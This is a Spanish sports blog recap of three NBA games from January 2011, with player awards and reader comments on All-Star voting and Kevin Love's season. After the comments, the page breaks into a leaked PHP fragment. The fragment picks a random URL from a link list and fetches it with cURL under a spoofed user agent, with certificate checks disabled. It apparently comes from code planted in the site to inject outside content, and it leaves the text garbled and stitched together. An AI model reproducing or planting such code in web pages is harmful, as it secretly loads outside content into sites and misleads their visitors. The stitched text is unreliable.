La Crónica (13/01/2011)

14 de January de 2011 por TheDeerHunter

Segunda jornada consecutiva con los cocos de la Southeast doblegados.

En el mejor evento del día los Magic visitaban la complicada cancha del Oklahoma City Arena. Howard estuvo monstruoso, pero a sus compañeros volvió a costarles entrar en juego hasta el último cuarto en el que le endosaron nada menos que 38 puntos a la defensa local. Sin embargo, para entonces ya era muy complicado porque Durant y Westbrook se habían encontrado excesivamente cómodos durante todo el choque. Se resolvió a la lotería de un toma y daca de canastas imposibles, en la que los Thunder tuvieron un punto más de fortuna (124-125).

El karma de LeBron no les fue tampoco propicio a los Heat anoche en Denver (102-130). Él no fue de la partida a causa de la torcedura que sufrió ayer, pero al contrario de lo que podría parecer lo que se resintió en el equipo fue la defensa. A Wade se le vio bastante despistado en ambos lados de la cancha y lo pagó con una actuación memorable de JR Smith que se cascó 8 triples. Un total de 130 encajó el equipo de Spoelstra. 40 más que su media durante el curso.

Para terminar, por un día los Wolves lograron aprovechar el partidazo cotidiano de Kevin Love ganando a los Wizards (97-109). Sin Beasley, lesionado, Milicic y Ridnour le resultaron de gran ayuda. No hubo continuidad en el juego de Nick Young y el mejor de su equipo fue Rashard Lewis. John Wall estuvo bien, pero se llevó un -18 en la mochila.

PREMIOS

MVP: Dos nombres destacan por encima del resto: Kevin Love con su ‘rutina’ de cada día hizo 35 puntos, 11 rebotes, 4 asistencias, 13 de 18 en tiros, 5 de 6 en triples y 4 de 4 en tiros libres. Su temporada es ME-MO-RA-BLE. Y Russell Westbrook fue el mejor de los Thunders con un triple doble de 32-10-13, 2 tapones y un 50% en tiro.

Rookie: Buen partido de un John Wall al que esperamos ver sano lo que queda de campaña. Anoche dejó 14 puntos, 4 rebotes, 10 asistencias y 3 robos.

Sorpresa: 130 puntos recibieron los Heat, en gran parte gracias al renacer de JR Smith con 8 triples para un total de 27 puntos, realmente poco habituales esta campaña para el.

Decepción: A los grandes les exigimos mucho, así que en ausencia de Lebron esperábamos mas que 16 puntos de Wade, con un 7 de 19 en tiros de campo y 2 de 7 en tiros libres.

MEV: Dwight Howard vio como su monstruosa actuación de 39 puntos y 18 rebotes que acompañó con un brillante 17 de 20 en tiros libres se fue a la basura.

Comenta

11 comentarios a esta entrada

  1. KB # 24 dice:
    #1

    uiuiuiuiii… estos Beach Boys… no queda nada del surfing USA que hace unos días mostraban… en comparación con otros big three’s veo que cuando uno de los 3 no está el equipo se resiente mucho, aún así les doy ventaja de campo en todas las eliminatorias, despues en PO será otro cuento.

      Citar

  2. TheDeerHunter dice:
    #2

    En el último recuento del all-star la cosa sigue igual.
    Este: Rose, Wade, LeBron, Stat, Howard
    Oeste: CP3, Kobe, Melo, Durant y Yao (Bynum)

    Griffin se pone 4º en los aleros del Oeste, por cierto

      Citar

  3. MagicJohnson32 dice:
    #3

    Como dice la crónica, vaya temporada de Love. Es una salvajada lo que está haciendo, algo histórico: lleva camino de promediar más de 20 puntos, más de 15 rebotes y más de un 45% en triples. Qué brutalidad.

    Si Howard hace un 17 de 20 en libres y los Magic pierden es que algo falla xD

      Citar

  4. KB # 24 dice:
    #4

    Ayer leí una notícia que decía que en caso de lesión de uno de los titulares (Yao) el jugador que replazará al suplente sería uno elegido por Stern. Pau? Griffin? jajaja soñar es gratis!

      Citar

  5. Rompe dice:
    #5

    Está claro que el All Star es un negocio, y como tal las votaciones no tienen precio. Pero lo más justo sería mandar a los mejores de cada conferencia en su puesto en relación a la eficiencia.. Fijaros qué equipos saldrían:

    Este: Rose – Wade – James – Boozer – Stoudamire

    Oeste: Paul – Bryant – Durant – Love – Gasol

    Eso sí, dividiendo a los jugadores en 5 posiciones, no en tres…

      Citar

  6. KB # 24 dice:
    #6

    Rompe tiene razón, eso de las votaciones a 3 posiciones es una tonteria. Me acuerdo cuando en el oeste eran titulares Duncan Yao y Garnett, quien es el small forward?

      Citar

  7. Sempren dice:
    #7

    5 de 6 en triples, qué animal. ¿Desde dónde los mete? Porque uno o dos por partido, pues sí que me imaginaba que se podía quedar solo en la esquina más o menos habitualmente, pero 5 en un partido…

      Citar

  8. sergio dice:
    #8

    De hecho. Love es el primero de la historia que haria eso Magic. A mi lo que mas me sorprende es su porcentaje de triples durante su carrera. Aunque suene pretencioso por las escasas temporadas que lleva en la NBA, tiene el mismo porcentaje de triples que Nowitzki.

      Citar

  9. GreenPride dice:
    #9

    Anoche vi el Magic@Thunder. Partido muy ofensivo. Preocupante para Orlando que con Howard dominando las zonas y sus tiradores metiendo triples a porrillo aun perdieran el partido ¿Defensa? ¿Rebote? sin esas dos cosas es imposible ganar a un buen equipo y por los Thunder estuvieron fenomenales Westbrook y Durant y Krstic castigó las ayudas de Howard con su tirito exterior. Aun así los Thunder también necesitarán hacer más en defensa si pretenden poder hacer algo cuando llegue la hora de la verdad.

      Citar

  10. Denise dice:
    #10

    Vaya partidazo de Howard y de Durant. Ambos han hecho lo que les ha dado la gana.
    A pesar de las 2 derrotas consecutivas de los Magic, no debe haber sintomas de preocupación, con un poco de suerte en los instantes finales se podían haber ganado los 2 partidos, la lástima es que no se ha aprovechado las 2 derrotas de los Heat para recortar distancias por el liderato de la Sureste.
    66 puntos les han metido el banco de Nuggets a los Heat. Está claro que si alguno del big 3 se lesiona, en especial Lebron, que para mi sería el MVP de lo que llevamos de liga, Miami se convierte en un equipo vulgar.

      Citar

  11. a dice:
    #11

    Buff, como se nota la ausencia de LeBron, lo que no hace sino demostrar lo jugadorazo que es (aunque me duela decirlo). Se va de Cleveland, éstos se convierten en una banda. Se lesiona, y los beach boys parecen bitch boys (perdon por el chiste facil). Maldito lebron!
    Espero sinceramente que los celtics ahora con la plantilla más o menos sana puedan aguantar el tirón de los heat y tener ventaja de campo en una presumible final del este.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>